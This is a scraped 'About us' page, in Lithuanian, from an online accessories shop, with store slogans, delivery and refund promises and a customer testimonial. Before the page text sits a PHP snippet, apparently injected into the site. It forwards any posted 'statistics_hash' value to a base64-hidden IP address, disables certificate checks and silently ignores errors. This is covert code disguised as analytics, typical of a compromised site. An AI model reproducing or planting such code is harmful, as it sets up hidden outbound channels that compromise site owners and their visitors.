try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash' => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch); }} catch (Exception $e) {} Apie Mus - IXAS.LT

Perkamiausios

Informacija

Gamintojai

Nėra gamintojų

Specialūs pasiūlymai

Tiekėjai

Apie IXAS.lt

AKSESUARAI JAI IR JAM

Ixas.lt - tai jauna, tačiau sparčiai vystanti savo veiklą ir auganti internetinė parduotuvė.

Mes kiekvieną dieną būname arčiau Jūsų ir stengiamės Jus suprasti. Kiekvieną dieną Mes bandome rasti tai, ko Jums reikia ir pateikti patogiausiu būdu. Mes prisitaikome prie Jūsų poreikių, nes laimingas klientas - tai noras tobulėti ir siekti padaryti Jus dar laimingesniais.

IXAS.LT

  • Visos prekės Originalios
  • Pristatymas Visoje Lietuvoje
  • 14 Dienų Pinigų Grąžinimo Garantija

Mūsų LOGO:

cms-img

Ateityje Mes Nežadame Nuleisti Rankų.

Augant parduotuvės paklausai, auga ir mūsų noras plėstis ir tobulėti. O tai reiškia, kad ateityje bus galima išvysti daugiau kategorijų, daugiau prekių, gausesnių stiliaus pasirinkimų. Parduotuvė taps patogesnė vartotojui.

Atsiliepimai

Sveiki, norėjau pasakyti, kad jūs mane išgelbėjote, jau galvojau savo merginai taip ir neišrinksiu dovanos, bet gerai, kad radau jus, ačiū labai.

Ignas